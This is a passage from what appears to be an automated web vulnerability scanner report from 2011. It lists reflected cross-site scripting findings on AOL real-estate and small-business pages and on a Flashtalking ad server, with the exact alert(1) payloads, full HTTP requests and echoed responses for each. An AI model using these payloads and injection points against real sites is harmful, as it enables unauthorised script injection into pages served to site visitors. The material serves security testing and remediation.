The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaf12"style%3d"x%3aexpression(alert(1))"c3cb16c7ff was submitted in the REST URL parameter 4. This input was echoed as eaf12"style="x:expression(alert(1))"c3cb16c7ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /blog/2011/02/04eaf12"style%3d"x%3aexpression(alert(1))"c3cb16c7ff/million-dollar-home-defaults-just-what-the-doctor-ordered/ HTTP/1.1 Host: realestate.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--PLUGIN NOTICE: Cache miss or caching is disabled. Parameters Array (
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5777"a%3d"b"0794e1ec659 was submitted in the REST URL parameter 4. This input was echoed as f5777"a="b"0794e1ec659 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/2011/02/04f5777"a%3d"b"0794e1ec659/worst-foreclosed-home-vandalism-ever/ HTTP/1.1 Host: realestate.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--PLUGIN NOTICE: Cache miss or caching is disabled. Parameters Array (
The value of the 97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbd12"-alert(1)-"111d3ab201f was submitted in the 97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1253664/0/225/AdId=1428644;BnId=2;itime=23846725;kvpg=aisledash;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93306318;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;kp=87058;nodecode=yes;link=bbd12"-alert(1)-"111d3ab201f&ftx=&fty=&ftadz=&ftscw=&cachebuster=359483.4308605641 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://www.aisledash.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=11328D1137525B"
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:24:32 GMT Server: Jetty(6.1.22) P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript Cache-Control: no-cache, no-store pragma: no-cache Content-Length: 811 Via: 1.1 mdw061007 (MII-APC/1.6)
var ftGUID_97125="11328D1137525B"; var ftConfID_97125="0"; var ftParams_97125="click=http://at.atwola.com/adlink/5113/1253664/0/225/AdId=1428644;BnId=2;itime=23846725;kvpg=aisledash;kvugc=0;kvui=e1 ...[SNIP]... 50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;kp=87058;nodecode=yes;link=bbd12"-alert(1)-"111d3ab201f&ftx=&fty=&ftadz=&ftscw=&cachebuster=359483.4308605641"; var ftKeyword_97125=""; var ftSegment_97125="";
The value of the 97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 669f0"-alert(1)-"5792a5b5c84 was submitted in the 97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=669f0"-alert(1)-"5792a5b5c84&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:48:16 GMT Server: Jetty(6.1.22) Set-Cookie: flashtalkingad1="GUID=11326E86B479C3";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:16 GMT P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript Cache-Control: no-cache, no-store pragma: no-cache Content-Length: 758 Via: 1.1 mdw061005 (MII-APC/1.6)
var ftGUID_97126="11326E86B479C3"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... 72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=669f0"-alert(1)-"5792a5b5c84&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339"; var ftKeyword_97126=""; var ftSegment_97126="";
The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92b2b"-alert(1)-"f12dac9a158 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.582638233992b2b"-alert(1)-"f12dac9a158 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:49:16 GMT Server: Jetty(6.1.22) Set-Cookie: flashtalkingad1="GUID=11327B18B63DDD";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:49:16 GMT P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript Cache-Control: no-cache, no-store pragma: no-cache Content-Length: 758 Via: 1.1 mdw061006 (MII-APC/1.6)
var ftGUID_97126="11327B18B63DDD"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... 53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.582638233992b2b"-alert(1)-"f12dac9a158"; var ftKeyword_97126=""; var ftSegment_97126="";
The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79af2"-alert(1)-"04fe214699f was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=79af2"-alert(1)-"04fe214699f&ftscw=&cachebuster=710415.5826382339 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:48:51 GMT Server: Jetty(6.1.22) Set-Cookie: flashtalkingad1="GUID=113270ECF2D3D1";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:51 GMT P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript Cache-Control: no-cache, no-store pragma: no-cache Content-Length: 758 Via: 1.1 mdw061004 (MII-APC/1.6)
var ftGUID_97126="113270ECF2D3D1"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... :50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=79af2"-alert(1)-"04fe214699f&ftscw=&cachebuster=710415.5826382339"; var ftKeyword_97126=""; var ftSegment_97126="";
The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 877e4"-alert(1)-"462c4afd1b1 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=877e4"-alert(1)-"462c4afd1b1&cachebuster=710415.5826382339 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:49:04 GMT Server: Jetty(6.1.22) Set-Cookie: flashtalkingad1="GUID=11323EB1B09D0E";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:49:04 GMT Cache-Control: no-cache, no-store Content-Length: 758 content-type: text/javascript P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" pragma: no-cache Via: 1.1 mdw061001 (MII-APC/1.6)
var ftGUID_97126="11323EB1B09D0E"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... 51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=877e4"-alert(1)-"462c4afd1b1&cachebuster=710415.5826382339"; var ftKeyword_97126=""; var ftSegment_97126="";
The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b507"-alert(1)-"1359c52bda6 was submitted in the ftx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=8b507"-alert(1)-"1359c52bda6&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:48:25 GMT Server: Jetty(6.1.22) Set-Cookie: flashtalkingad1="GUID=11327F503D579E";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:25 GMT Cache-Control: no-cache, no-store Content-Length: 758 content-type: text/javascript P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" pragma: no-cache Via: 1.1 mdw061001 (MII-APC/1.6)
var ftGUID_97126="11327F503D579E"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... ;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=8b507"-alert(1)-"1359c52bda6&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339"; var ftKeyword_97126=""; var ftSegment_97126="";
The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b515f"-alert(1)-"d141519c932 was submitted in the fty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=b515f"-alert(1)-"d141519c932&ftadz=&ftscw=&cachebuster=710415.5826382339 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:48:38 GMT Server: Jetty(6.1.22) Set-Cookie: flashtalkingad1="GUID=11328D1137525B";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:38 GMT Content-Length: 758 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061003 (MII-APC/1.6)
var ftGUID_97126="11328D1137525B"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... g=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=b515f"-alert(1)-"d141519c932&ftadz=&ftscw=&cachebuster=710415.5826382339"; var ftKeyword_97126=""; var ftSegment_97126="";
1.196. http://servedby.flashtalking.com/imp/3/14886 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://servedby.flashtalking.com
Path:
/imp/3/14886
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9548d"-alert(1)-"1c425036cc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339&9548d"-alert(1)-"1c425036cc1=1 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:49:29 GMT Server: Jetty(6.1.22) Set-Cookie: flashtalkingad1="GUID=1132056B5C07B9";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:49:29 GMT Cache-Control: no-cache, no-store Content-Length: 761 content-type: text/javascript P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" pragma: no-cache Via: 1.1 mdw061003 (MII-APC/1.6)
var ftGUID_97126="1132056B5C07B9"; var ftConfID_97126="0"; var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn ...[SNIP]... 3575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339&9548d"-alert(1)-"1c425036cc1=1"; var ftKeyword_97126=""; var ftSegment_97126="";
1.197. http://smallbusiness.aol.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://smallbusiness.aol.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 998a2"><script>alert(1)</script>9cd08062e59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?998a2"><script>alert(1)</script>9cd08062e59=1 HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7d53"><img%20src%3da%20onerror%3dalert(1)>d069487f7e was submitted in the REST URL parameter 3. This input was echoed as c7d53"><img src=a onerror=alert(1)>d069487f7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /2011/02/01c7d53"><img%20src%3da%20onerror%3dalert(1)>d069487f7e/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.199. http://smallbusiness.aol.com/2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53b6e"><script>alert(1)</script>a03fac11be7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/?53b6e"><script>alert(1)</script>a03fac11be7=1 HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4f14"%20a%3db%202dd62ea6f1a was submitted in the REST URL parameter 3. This input was echoed as e4f14" a=b 2dd62ea6f1a in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2011/02/02e4f14"%20a%3db%202dd62ea6f1a/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.201. http://smallbusiness.aol.com/2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c220"><script>alert(1)</script>01c18185ad3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/?9c220"><script>alert(1)</script>01c18185ad3=1 HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8709"a%3d"b"648ab0da27 was submitted in the REST URL parameter 3. This input was echoed as c8709"a="b"648ab0da27 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2011/02/05c8709"a%3d"b"648ab0da27/make-friends/ HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <input type="hidden" name="referer" value="http://smallbusiness.aol.com:1080/2011/02/05c8709"a="b"648ab0da27/make-friends/"> ...[SNIP]...
1.203. http://smallbusiness.aol.com/2011/02/05/make-friends/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://smallbusiness.aol.com
Path:
/2011/02/05/make-friends/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97c25"><script>alert(1)</script>7fcfb2a62be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/05/make-friends/?97c25"><script>alert(1)</script>7fcfb2a62be=1 HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://smallbusiness.aol.com/2011/02/05/make-friends/?97c25"><script>alert(1)</script>7fcfb2a62be=1"/> ...[SNIP]...
1.204. http://smallbusiness.aol.com/2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/ [name of an arbitrarily supplied request parameter]previousnext
